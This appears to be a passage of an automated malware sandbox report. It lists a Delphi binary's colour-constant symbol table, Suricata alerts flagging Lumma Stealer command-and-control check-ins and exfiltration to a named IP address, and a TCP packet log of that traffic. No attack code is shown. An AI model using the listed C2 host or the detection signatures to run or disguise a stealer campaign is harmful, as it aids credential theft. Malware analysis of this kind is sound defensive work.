@System@Uitypes@TAlphaColorRec@Peachpuff	350	0x463c80
@System@Uitypes@TAlphaColorRec@Peru	351	0x463c84
@System@Uitypes@TAlphaColorRec@Pink	352	0x463c88
@System@Uitypes@TAlphaColorRec@Plum	353	0x463c8c
@System@Uitypes@TAlphaColorRec@Powderblue	354	0x463c90
@System@Uitypes@TAlphaColorRec@Purple	355	0x463c94
@System@Uitypes@TAlphaColorRec@Red	356	0x463c98
@System@Uitypes@TAlphaColorRec@Rosybrown	357	0x463c9c
@System@Uitypes@TAlphaColorRec@Royalblue	358	0x463ca0
@System@Uitypes@TAlphaColorRec@Saddlebrown	359	0x463ca4
@System@Uitypes@TAlphaColorRec@Salmon	360	0x463ca8
@System@Uitypes@TAlphaColorRec@Sandybrown	361	0x463cac
@System@Uitypes@TAlphaColorRec@Seagreen	362	0x463cb0
@System@Uitypes@TAlphaColorRec@Seashell	363	0x463cb4
@System@Uitypes@TAlphaColorRec@Sienna	364	0x463cb8
@System@Uitypes@TAlphaColorRec@Silver	365	0x463cbc
@System@Uitypes@TAlphaColorRec@Skyblue	366	0x463cc0
@System@Uitypes@TAlphaColorRec@Slateblue	367	0x463cc4
@System@Uitypes@TAlphaColorRec@Slategray	368	0x463cc8
@System@Uitypes@TAlphaColorRec@Slategrey	369	0x463ccc
@System@Uitypes@TAlphaColorRec@Snow	370	0x463cd0
@System@Uitypes@TAlphaColorRec@Springgreen	371	0x463cd4
@System@Uitypes@TAlphaColorRec@Steelblue	372	0x463cd8
@System@Uitypes@TAlphaColorRec@Tan	373	0x463cdc
@System@Uitypes@TAlphaColorRec@Teal	374	0x463ce0
@System@Uitypes@TAlphaColorRec@Thistle	375	0x463ce4
@System@Uitypes@TAlphaColorRec@Tomato	376	0x463ce8
@System@Uitypes@TAlphaColorRec@Turquoise	377	0x463cec
@System@Uitypes@TAlphaColorRec@Violet	378	0x463cf0
@System@Uitypes@TAlphaColorRec@Wheat	379	0x463cf4
@System@Uitypes@TAlphaColorRec@White	380	0x463cf8
@System@Uitypes@TAlphaColorRec@Whitesmoke	381	0x463cfc
@System@Uitypes@TAlphaColorRec@Yellow	382	0x463d00
@System@Uitypes@TAlphaColorRec@Yellowgreen	383	0x463d04
@System@Uitypes@TColorRec@Aliceblue	76	0x463838
@System@Uitypes@TColorRec@Antiquewhite	77	0x46383c
@System@Uitypes@TColorRec@Aqua	78	0x463840
@System@Uitypes@TColorRec@Aquamarine	79	0x463844
@System@Uitypes@TColorRec@Azure	80	0x463848
@System@Uitypes@TColorRec@Beige	81	0x46384c
@System@Uitypes@TColorRec@Bisque	82	0x463850
@System@Uitypes@TColorRec@Black	83	0x463854
@System@Uitypes@TColorRec@Blanchedalmond	84	0x463858
@System@Uitypes@TColorRec@Blue	85	0x46385c
@System@Uitypes@TColorRec@Blueviolet	86	0x463860
@System@Uitypes@TColorRec@Brown	87	0x463864
@System@Uitypes@TColorRec@Burlywood	88	0x463868
@System@Uitypes@TColorRec@Cadetblue	89	0x46386c
@System@Uitypes@TColorRec@Chartreuse	90	0x463870
@System@Uitypes@TColorRec@Chocolate	91	0x463874
@System@Uitypes@TColorRec@Coral	92	0x463878
@System@Uitypes@TColorRec@Cornflowerblue	93	0x46387c
@System@Uitypes@TColorRec@Cornsilk	94	0x463880
@System@Uitypes@TColorRec@Cream	163	0x463994
@System@Uitypes@TColorRec@Crimson	95	0x463884
@System@Uitypes@TColorRec@Cyan	96	0x463888
@System@Uitypes@TColorRec@Darkblue	97	0x46388c
@System@Uitypes@TColorRec@Darkcyan	98	0x463890
@System@Uitypes@TColorRec@Darkgoldenrod	99	0x463894
@System@Uitypes@TColorRec@Darkgray	100	0x463898
@System@Uitypes@TColorRec@Darkgreen	101	0x46389c
@System@Uitypes@TColorRec@Darkgrey	102	0x4638a0
@System@Uitypes@TColorRec@Darkkhaki	103	0x4638a4
@System@Uitypes@TColorRec@Darkmagenta	104	0x4638a8
@System@Uitypes@TColorRec@Darkolivegreen	105	0x4638ac
@System@Uitypes@TColorRec@Darkorange	106	0x4638b0
@System@Uitypes@TColorRec@Darkorchid	107	0x4638b4
@System@Uitypes@TColorRec@Darkred	108	0x4638b8
@System@Uitypes@TColorRec@Darksalmon	109	0x4638bc
@System@Uitypes@TColorRec@Darkseagreen	110	0x4638c0
@System@Uitypes@TColorRec@Darkslateblue	111	0x4638c4
@System@Uitypes@TColorRec@Darkslategray	112	0x4638c8
@System@Uitypes@TColorRec@Darkslategrey	113	0x4638cc
@System@Uitypes@TColorRec@Darkturquoise	114	0x4638d0
@System@Uitypes@TColorRec@Darkviolet	115	0x4638d4
@System@Uitypes@TColorRec@Deeppink	116	0x4638d8
@System@Uitypes@TColorRec@Deepskyblue	117	0x4638dc
@System@Uitypes@TColorRec@Dimgray	118	0x4638e0
@System@Uitypes@TColorRec@Dimgrey	119	0x4638e4
@System@Uitypes@TColorRec@DkGray	160	0x463988
@System@Uitypes@TColorRec@Dodgerblue	120	0x4638e8
@System@Uitypes@TColorRec@Firebrick	121	0x4638ec
@System@Uitypes@TColorRec@Floralwhite	122	0x4638f0
@System@Uitypes@TColorRec@Forestgreen	123	0x4638f4
@System@Uitypes@TColorRec@Fuchsia	124	0x4638f8
@System@Uitypes@TColorRec@Gainsboro	125	0x4638fc
@System@Uitypes@TColorRec@Ghostwhite	126	0x463900
@System@Uitypes@TColorRec@Gold	127	0x463904
@System@Uitypes@TColorRec@Goldenrod	128	0x463908
@System@Uitypes@TColorRec@Gray	129	0x46390c
@System@Uitypes@TColorRec@Green	130	0x463910
@System@Uitypes@TColorRec@Greenyellow	131	0x463914
@System@Uitypes@TColorRec@Grey	132	0x463918
@System@Uitypes@TColorRec@Honeydew	133	0x46391c
@System@Uitypes@TColorRec@Hotpink	134	0x463920
@System@Uitypes@TColorRec@Indianred	135	0x463924
@System@Uitypes@TColorRec@Indigo	136	0x463928
@System@Uitypes@TColorRec@Ivory	137	0x46392c
@System@Uitypes@TColorRec@Khaki	138	0x463930
@System@Uitypes@TColorRec@Lavender	139	0x463934
@System@Uitypes@TColorRec@Lavenderblush	140	0x463938
@System@Uitypes@TColorRec@Lawngreen	141	0x46393c
@System@Uitypes@TColorRec@LegacySkyBlue	162	0x463990
@System@Uitypes@TColorRec@Lemonchiffon	142	0x463940
@System@Uitypes@TColorRec@Lightblue	143	0x463944
@System@Uitypes@TColorRec@Lightcoral	144	0x463948
@System@Uitypes@TColorRec@Lightcyan	145	0x46394c
@System@Uitypes@TColorRec@Lightgoldenrodyellow	146	0x463950
@System@Uitypes@TColorRec@Lightgray	147	0x463954
@System@Uitypes@TColorRec@Lightgreen	148	0x463958
@System@Uitypes@TColorRec@Lightgrey	149	0x46395c
@System@Uitypes@TColorRec@Lightpink	150	0x463960
@System@Uitypes@TColorRec@Lightsalmon	151	0x463964
@System@Uitypes@TColorRec@Lightseagreen	152	0x463968
@System@Uitypes@TColorRec@Lightskyblue	153	0x46396c
@System@Uitypes@TColorRec@Lightslategray	154	0x463970
@System@Uitypes@TColorRec@Lightslategrey	155	0x463974
@System@Uitypes@TColorRec@Lightsteelblue	156	0x463978
@System@Uitypes@TColorRec@Lightyellow	157	0x46397c
@System@Uitypes@TColorRec@Lime	164	0x463998
@System@Uitypes@TColorRec@Limegreen	165	0x46399c
@System@Uitypes@TColorRec@Linen	166	0x4639a0
@System@Uitypes@TColorRec@LtGray	158	0x463980
@System@Uitypes@TColorRec@Magenta	167	0x4639a4
@System@Uitypes@TColorRec@Maroon	168	0x4639a8
@System@Uitypes@TColorRec@MedGray	159	0x463984
@System@Uitypes@TColorRec@Mediumaquamarine	169	0x4639ac
@System@Uitypes@TColorRec@Mediumblue	170	0x4639b0
@System@Uitypes@TColorRec@Mediumorchid	171	0x4639b4
@System@Uitypes@TColorRec@Mediumpurple	172	0x4639b8
@System@Uitypes@TColorRec@Mediumseagreen	173	0x4639bc
@System@Uitypes@TColorRec@Mediumslateblue	174	0x4639c0
@System@Uitypes@TColorRec@Mediumspringgreen	175	0x4639c4
@System@Uitypes@TColorRec@Mediumturquoise	176	0x4639c8
@System@Uitypes@TColorRec@Mediumvioletred	177	0x4639cc
@System@Uitypes@TColorRec@Midnightblue	178	0x4639d0
@System@Uitypes@TColorRec@Mintcream	179	0x4639d4
@System@Uitypes@TColorRec@Mistyrose	180	0x4639d8
@System@Uitypes@TColorRec@Moccasin	181	0x4639dc
@System@Uitypes@TColorRec@MoneyGreen	161	0x46398c
@System@Uitypes@TColorRec@Navajowhite	182	0x4639e0
@System@Uitypes@TColorRec@Navy	183	0x4639e4
@System@Uitypes@TColorRec@Null	229	0x463a9c
@System@Uitypes@TColorRec@Oldlace	184	0x4639e8
@System@Uitypes@TColorRec@Olive	185	0x4639ec
@System@Uitypes@TColorRec@Olivedrab	186	0x4639f0
@System@Uitypes@TColorRec@Orange	187	0x4639f4
@System@Uitypes@TColorRec@Orangered	188	0x4639f8
@System@Uitypes@TColorRec@Orchid	189	0x4639fc
@System@Uitypes@TColorRec@Palegoldenrod	190	0x463a00
@System@Uitypes@TColorRec@Palegreen	191	0x463a04
@System@Uitypes@TColorRec@Paleturquoise	192	0x463a08
@System@Uitypes@TColorRec@Palevioletred	193	0x463a0c
@System@Uitypes@TColorRec@Papayawhip	194	0x463a10
@System@Uitypes@TColorRec@Peachpuff	195	0x463a14
@System@Uitypes@TColorRec@Peru	196	0x463a18
@System@Uitypes@TColorRec@Pink	197	0x463a1c
@System@Uitypes@TColorRec@Plum	198	0x463a20
@System@Uitypes@TColorRec@Powderblue	199	0x463a24
@System@Uitypes@TColorRec@Purple	200	0x463a28
@System@Uitypes@TColorRec@Red	201	0x463a2c
@System@Uitypes@TColorRec@Rosybrown	202	0x463a30
@System@Uitypes@TColorRec@Royalblue	203	0x463a34
@System@Uitypes@TColorRec@Saddlebrown	204	0x463a38
@System@Uitypes@TColorRec@Salmon	205	0x463a3c
@System@Uitypes@TColorRec@Sandybrown	206	0x463a40
@System@Uitypes@TColorRec@Seagreen	207	0x463a44
@System@Uitypes@TColorRec@Seashell	208	0x463a48
@System@Uitypes@TColorRec@Sienna	209	0x463a4c
@System@Uitypes@TColorRec@Silver	210	0x463a50
@System@Uitypes@TColorRec@Skyblue	211	0x463a54
@System@Uitypes@TColorRec@Slateblue	212	0x463a58
@System@Uitypes@TColorRec@Slategray	213	0x463a5c
@System@Uitypes@TColorRec@Slategrey	214	0x463a60
@System@Uitypes@TColorRec@Snow	215	0x463a64
@System@Uitypes@TColorRec@Springgreen	216	0x463a68
@System@Uitypes@TColorRec@Steelblue	217	0x463a6c
@System@Uitypes@TColorRec@Sys3DDkShadow	65	0x46380c
@System@Uitypes@TColorRec@Sys3DLight	66	0x463810
@System@Uitypes@TColorRec@SysActiveBorder	54	0x4637e0
@System@Uitypes@TColorRec@SysActiveCaption	46	0x4637c0
@System@Uitypes@TColorRec@SysAppWorkSpace	56	0x4637e8
@System@Uitypes@TColorRec@SysBackground	45	0x4637bc
@System@Uitypes@TColorRec@SysBtnFace	59	0x4637f4
@System@Uitypes@TColorRec@SysBtnHighlight	64	0x463808
@System@Uitypes@TColorRec@SysBtnShadow	60	0x4637f8
@System@Uitypes@TColorRec@SysBtnText	62	0x463800
@System@Uitypes@TColorRec@SysCaptionText	53	0x4637dc
@System@Uitypes@TColorRec@SysDefault	75	0x463834
@System@Uitypes@TColorRec@SysGradientActiveCaption	70	0x463820
@System@Uitypes@TColorRec@SysGradientInactiveCaption	71	0x463824
@System@Uitypes@TColorRec@SysGrayText	61	0x4637fc
@System@Uitypes@TColorRec@SysHighlight	57	0x4637ec
@System@Uitypes@TColorRec@SysHighlightText	58	0x4637f0
@System@Uitypes@TColorRec@SysHotLight	69	0x46381c
@System@Uitypes@TColorRec@SysInactiveBorder	55	0x4637e4
@System@Uitypes@TColorRec@SysInactiveCaption	47	0x4637c4
@System@Uitypes@TColorRec@SysInactiveCaptionText	63	0x463804
@System@Uitypes@TColorRec@SysInfoBk	68	0x463818
@System@Uitypes@TColorRec@SysInfoText	67	0x463814
@System@Uitypes@TColorRec@SysMenu	48	0x4637c8
@System@Uitypes@TColorRec@SysMenuBar	73	0x46382c
@System@Uitypes@TColorRec@SysMenuHighlight	72	0x463828
@System@Uitypes@TColorRec@SysMenuText	51	0x4637d4
@System@Uitypes@TColorRec@SysNone	74	0x463830
@System@Uitypes@TColorRec@SysScrollBar	44	0x4637b8
@System@Uitypes@TColorRec@SysWindow	49	0x4637cc
@System@Uitypes@TColorRec@SysWindowFrame	50	0x4637d0
@System@Uitypes@TColorRec@SysWindowText	52	0x4637d8
@System@Uitypes@TColorRec@SystemColor	6	0x463720
@System@Uitypes@TColorRec@Tan	218	0x463a70
@System@Uitypes@TColorRec@Teal	219	0x463a74
@System@Uitypes@TColorRec@Thistle	220	0x463a78
@System@Uitypes@TColorRec@Tomato	221	0x463a7c
@System@Uitypes@TColorRec@Turquoise	222	0x463a80
@System@Uitypes@TColorRec@Violet	223	0x463a84
@System@Uitypes@TColorRec@Wheat	224	0x463a88
@System@Uitypes@TColorRec@White	225	0x463a8c
@System@Uitypes@TColorRec@Whitesmoke	226	0x463a90
@System@Uitypes@TColorRec@Yellow	227	0x463a94
@System@Uitypes@TColorRec@Yellowgreen	228	0x463a98
@System@Uitypes@TColorRec@c3DDKSHADOW	28	0x463778
@System@Uitypes@TColorRec@c3DFACE	39	0x4637a4
@System@Uitypes@TColorRec@c3DHIGHLIGHT	41	0x4637ac
@System@Uitypes@TColorRec@c3DHILIGHT	42	0x4637b0
@System@Uitypes@TColorRec@c3DLIGHT	29	0x46377c
@System@Uitypes@TColorRec@c3DSHADOW	40	0x4637a8
@System@Uitypes@TColorRec@cACTIVEBORDER	17	0x46374c
@System@Uitypes@TColorRec@cACTIVECAPTION	9	0x46372c
@System@Uitypes@TColorRec@cAPPWORKSPACE	19	0x463754
@System@Uitypes@TColorRec@cBACKGROUND	8	0x463728
@System@Uitypes@TColorRec@cBTNFACE	22	0x463760
@System@Uitypes@TColorRec@cBTNHIGHLIGHT	27	0x463774
@System@Uitypes@TColorRec@cBTNHILIGHT	43	0x4637b4
@System@Uitypes@TColorRec@cBTNSHADOW	23	0x463764
@System@Uitypes@TColorRec@cBTNTEXT	25	0x46376c
@System@Uitypes@TColorRec@cCAPTIONTEXT	16	0x463748
@System@Uitypes@TColorRec@cDESKTOP	38	0x4637a0
@System@Uitypes@TColorRec@cENDCOLORS	37	0x46379c
@System@Uitypes@TColorRec@cGRADIENTACTIVECAPTION	33	0x46378c
@System@Uitypes@TColorRec@cGRADIENTINACTIVECAPTION	34	0x463790
@System@Uitypes@TColorRec@cGRAYTEXT	24	0x463768
@System@Uitypes@TColorRec@cHIGHLIGHT	20	0x463758
@System@Uitypes@TColorRec@cHIGHLIGHTTEXT	21	0x46375c
@System@Uitypes@TColorRec@cHOTLIGHT	32	0x463788
@System@Uitypes@TColorRec@cINACTIVEBORDER	18	0x463750
@System@Uitypes@TColorRec@cINACTIVECAPTION	10	0x463730
@System@Uitypes@TColorRec@cINACTIVECAPTIONTEXT	26	0x463770
@System@Uitypes@TColorRec@cINFOBK	31	0x463784
@System@Uitypes@TColorRec@cINFOTEXT	30	0x463780
@System@Uitypes@TColorRec@cMENU	11	0x463734
@System@Uitypes@TColorRec@cMENUBAR	36	0x463798
@System@Uitypes@TColorRec@cMENUHILIGHT	35	0x463794
@System@Uitypes@TColorRec@cMENUTEXT	14	0x463740
@System@Uitypes@TColorRec@cSCROLLBAR	7	0x463724
@System@Uitypes@TColorRec@cWINDOW	12	0x463738
@System@Uitypes@TColorRec@cWINDOWFRAME	13	0x46373c
@System@Uitypes@TColorRec@cWINDOWTEXT	15	0x463744
__GetExceptDLLinfo	1	0x401289
___CPPdebugHook	2	0x45e0ac

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-28T12:19:11.389405+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	104.21.87.112	443	TCP
2024-12-28T12:19:12.260955+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49736	104.21.87.112	443	TCP
2024-12-28T12:19:12.260955+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49736	104.21.87.112	443	TCP
2024-12-28T12:19:13.533124+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	104.21.87.112	443	TCP
2024-12-28T12:19:14.382028+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49737	104.21.87.112	443	TCP
2024-12-28T12:19:14.382028+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49737	104.21.87.112	443	TCP
2024-12-28T12:19:16.018165+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49739	104.21.87.112	443	TCP
2024-12-28T12:19:18.491187+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	104.21.87.112	443	TCP
2024-12-28T12:19:20.948614+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	104.21.87.112	443	TCP
2024-12-28T12:19:23.612991+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49746	104.21.87.112	443	TCP
2024-12-28T12:19:24.370093+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49746	104.21.87.112	443	TCP
2024-12-28T12:19:26.215811+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49748	104.21.87.112	443	TCP
2024-12-28T12:19:26.226591+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.4	49748	104.21.87.112	443	TCP
2024-12-28T12:19:31.734778+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49749	104.21.87.112	443	TCP
2024-12-28T12:19:32.519366+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49749	104.21.87.112	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 12:19:10.070741892 CET	49736	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:10.070781946 CET	443	49736	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:10.070868015 CET	49736	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:10.073854923 CET	49736	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:10.073873043 CET	443	49736	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:11.389203072 CET	443	49736	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:11.389405012 CET	49736	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:11.393537998 CET	49736	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:11.393547058 CET	443	49736	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:11.393948078 CET	443	49736	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:11.440381050 CET	49736	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:11.441843987 CET	49736	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:11.441874027 CET	49736	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:11.441945076 CET	443	49736	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:12.260952950 CET	443	49736	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:12.261034966 CET	443	49736	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:12.261107922 CET	49736	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:12.265085936 CET	49736	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:12.265098095 CET	443	49736	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:12.265122890 CET	49736	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:12.265129089 CET	443	49736	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:12.275011063 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:12.275051117 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:12.275137901 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:12.275475979 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:12.275489092 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:13.533010006 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:13.533123970 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:13.534684896 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:13.534693003 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:13.534895897 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:13.536041021 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:13.536070108 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:13.536109924 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.382024050 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.382075071 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.382113934 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.382124901 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:14.382144928 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.382175922 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:14.382179022 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.382189989 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.382221937 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:14.382229090 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.390227079 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.390281916 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:14.390299082 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.396256924 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.396357059 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:14.396367073 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.440377951 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:14.440397024 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.487242937 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:14.501646042 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.549741983 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:14.582818985 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.586599112 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.586625099 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.586637020 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:14.586647987 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.586690903 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:14.586695910 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.586705923 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.586749077 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:14.586930990 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:14.586945057 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.586952925 CET	49737	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:14.586957932 CET	443	49737	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.759182930 CET	49739	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:14.759213924 CET	443	49739	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:14.759277105 CET	49739	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:14.759584904 CET	49739	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:14.759597063 CET	443	49739	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:16.017853975 CET	443	49739	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:16.018165112 CET	49739	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:16.021625042 CET	49739	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:16.021636963 CET	443	49739	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:16.021863937 CET	443	49739	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:16.023603916 CET	49739	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:16.023603916 CET	49739	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:16.023639917 CET	443	49739	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:16.025700092 CET	49739	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:16.025707006 CET	443	49739	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:17.077595949 CET	443	49739	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:17.077697992 CET	443	49739	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:17.077797890 CET	49739	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:17.078047991 CET	49739	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:17.078072071 CET	443	49739	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:17.186446905 CET	49741	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:17.186530113 CET	443	49741	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:17.186657906 CET	49741	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:17.186949968 CET	49741	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:17.186988115 CET	443	49741	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:18.491070032 CET	443	49741	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:18.491187096 CET	49741	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:18.492397070 CET	49741	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:18.492428064 CET	443	49741	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:18.492654085 CET	443	49741	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:18.493818045 CET	49741	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:18.493931055 CET	49741	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:18.493973970 CET	443	49741	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:19.448941946 CET	443	49741	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:19.449044943 CET	443	49741	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:19.449126005 CET	49741	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:19.449289083 CET	49741	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:19.449326992 CET	443	49741	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:19.644445896 CET	49744	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:19.644485950 CET	443	49744	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:19.644551992 CET	49744	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:19.644865036 CET	49744	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:19.644879103 CET	443	49744	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:20.948529005 CET	443	49744	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:20.948613882 CET	49744	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:20.949940920 CET	49744	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:20.949953079 CET	443	49744	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:20.950165033 CET	443	49744	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:20.956335068 CET	49744	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:20.956482887 CET	49744	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:20.956516981 CET	443	49744	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:20.956588030 CET	49744	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:20.956597090 CET	443	49744	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:21.902160883 CET	443	49744	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:21.902252913 CET	443	49744	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:21.902340889 CET	49744	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:21.902585983 CET	49744	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:21.902605057 CET	443	49744	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:22.400216103 CET	49746	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:22.400258064 CET	443	49746	104.21.87.112	192.168.2.4
Dec 28, 2024 12:19:22.400330067 CET	49746	443	192.168.2.4	104.21.87.112
Dec 28, 2024 12:19:22.400600910 CET	49746	443	192.168.2.4	104.21.87.112
